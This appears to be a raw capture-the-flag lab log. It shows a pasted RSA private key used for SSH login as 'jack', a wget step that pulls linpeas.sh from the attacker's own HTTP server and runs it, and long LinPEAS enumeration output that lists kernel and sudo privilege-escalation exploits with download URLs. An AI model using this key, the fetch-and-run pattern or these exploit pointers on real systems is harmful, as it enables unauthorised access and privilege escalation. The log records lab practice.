zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----

┌──(kali㉿kali)-[~]
└─$ nano id_rsa_jack
                                                                                      
┌──(kali㉿kali)-[~]
└─$ cat id_rsa_jack 
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----


┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa_jack 
                                                                                      
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa_jack jack@10.10.12.106
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

143 packages can be updated.
92 updates are security updates.


Last login: Mon Nov 16 14:27:49 2020 from 10.11.12.223
jack@jack:~$ id
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)

┌──(kali㉿kali)-[~/Downloads]
└─$ locate pspy     
/home/kali/hackthebox/pspy64s
/home/kali/nappy/pspy64s
                                                                                                      
┌──(kali㉿kali)-[~/Downloads]
└─$ cd ../hackthebox       
                                                                                                      
┌──(kali㉿kali)-[~/hackthebox]
└─$ ls         
allowed.userlist                        gato.jpg_original  nc64.exe           Responder
allowed.userlist.passwd                 hash_vaccine       privesc_creds.xml  revshell.php
backup.zip                              hash_zip           prod.dtsConfig     rogue-jndi
car.py                                  id_rsa             pspy64s            share
exploit_redpanda.py                     index.php          racecar            style.css
ferox-http_shoppy_htb-1667929122.state  josh.hash          racecar.zip        winPEASx64.exe
gato.jpg                                linpeas.sh         r.elf              woodenk@10.10.11.170
                                                                                                      
┌──(kali㉿kali)-[~/hackthebox]
└─$ python3 -m http.server 8000                                                     
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


ack@jack:~/.ssh$ cd ..
jack@jack:~$ ls
reminder.txt  user.txt
jack@jack:~$ cd /tmp
jack@jack:/tmp$ wget http://10.8.19.103:8000/linpeas.sh
--2023-01-18 14:52:40--  http://10.8.19.103:8000/linpeas.sh
Connecting to 10.8.19.103:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 777018 (759K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh            100%[=======================>] 758.81K   608KB/s    in 1.2s    

2023-01-18 14:52:41 (608 KB/s) - ‘linpeas.sh’ saved [777018/777018]

jack@jack:/tmp$ chmod +x linpeas.sh;./linpeas.sh

jack@jack:/tmp$ ./linpeas.sh 


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------\
    |                             Do you like PEASS?                            |
    |---------------------------------------------------------------------------| 
    |         Get latest LinPEAS  :     https://github.com/sponsors/carlospolop |
    |         Follow on Twitter   :     @carlospolopm                           |
    |         Respect on HTB      :     SirBroccoli                             |
    |---------------------------------------------------------------------------|
    |                                 Thank you!                                |
    \---------------------------------------------------------------------------/
          linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
OS: Linux version 4.4.0-142-generic (buildd@lgw01-amd64-033) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10) ) #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
User & Groups: uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)
Hostname: jack
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)


Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE

                                        ╔════════════════════╗
════════════════════════════════════════╣ System Information ╠════════════════════════════════════════
                                        ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.4.0-142-generic (buildd@lgw01-amd64-033) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10) ) #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
Distributor ID:	Ubuntu
Description:	Ubuntu 16.04.6 LTS
Release:	16.04
Codename:	xenial

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.16

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

./linpeas.sh: 1197: ./linpeas.sh: [[: not found
./linpeas.sh: 1197: ./linpeas.sh: rpm: not found
./linpeas.sh: 1197: ./linpeas.sh: 0: not found
./linpeas.sh: 1207: ./linpeas.sh: [[: not found


╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/home/jack/bin:/home/jack/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /home/jack/bin:/home/jack/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

╔══════════╣ Date & uptime
Wed Jan 18 15:16:23 CST 2023
 15:16:23 up 27 min,  2 users,  load average: 0.19, 0.15, 0.38

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk

╔══════════╣ Unmounted file-system?
Check if you can mount unmounted devices
UUID=67a0c1f9-b482-40ba-8e93-f188d141fe64	/	ext4	errors=remount-ro	0 1
UUID=5aa0286c-eea1-44e2-b918-7041334f10a1	none	swap	sw	0 0

╔══════════╣ Environment
Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
MAIL=/var/mail/jack
SSH_CLIENT=10.8.19.103 39380 22
USER=jack
SHLVL=1
OLDPWD=/home/jack
HOME=/home/jack
SSH_TTY=/dev/pts/1
LOGNAME=jack
_=./linpeas.sh
XDG_SESSION_ID=16
TERM=xterm-256color
PATH=/home/jack/bin:/home/jack/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1000
LANG=en_US.UTF-8
HISTSIZE=0
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/tmp
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=10.8.19.103 39380 10.10.12.106 22
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2018-1000001] RationalLove

   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
  [1] af_packet
      CVE-2016-8655
      Source: http://www.exploit-db.com/exploits/40871
  [2] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [3] get_rekt
      CVE-2017-16695
      Source: http://www.exploit-db.com/exploits/45010


╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (xen)

                                             ╔═══════════╗
═════════════════════════════════════════════╣ Container ╠═════════════════════════════════════════════
                                             ╚═══════════╝
╔══════════╣ Container related tools present
/usr/bin/lxc
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No


                          ╔════════════════════════════════════════════════╗
══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠══════════════════════════
                          ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root         1  0.6  0.5  38016  6036 ?        Ss   14:48   0:11 /sbin/init
root       355  0.0  0.2  28348  2764 ?        Ss   14:49   0:00 /lib/systemd/systemd-journald
root       397  0.0  0.1  94772  1580 ?        Ss   14:49   0:00 /sbin/lvmetad -f
root       438  0.0  0.4  44700  4244 ?        Ss   14:49   0:01 /lib/systemd/systemd-udevd
systemd+   476  0.0  0.2 100324  2504 ?        Ssl  14:49   0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root       721  0.0  0.0  16128   864 ?        Ss   14:49   0:00 /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root       865  0.0  0.2  29008  2952 ?        Ss   14:49   0:00 /usr/sbin/cron -f
daemon[0m     876  0.0  0.2  26044  2244 ?        Ss   14:49   0:00 /usr/sbin/atd -f
root       879  0.0  0.2  28544  3004 ?        Ss   14:49   0:00 /lib/systemd/systemd-logind
root       882  5.1  0.3 645336  3428 ?        Ssl  14:49   1:23 /usr/bin/lxcfs /var/lib/lxcfs/
syslog     890  0.0  0.3 256396  3164 ?        Ssl  14:49   0:00 /usr/sbin/rsyslogd -n
root       892  0.0  2.4 214272 24956 ?        Ssl  14:49   0:00 /usr/lib/snapd/snapd
message+   901  0.0  0.3  42932  3928 ?        Ss   14:49   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  └─(Caps) 0x0000000020000000=cap_audit_write
root       913  0.0  0.6 275768  6204 ?        Ssl  14:49   0:00 /usr/lib/accountsservice/accounts-daemon[0m
root       918  0.0  0.1   4396  1284 ?        Ss   14:49   0:00 /usr/sbin/acpid
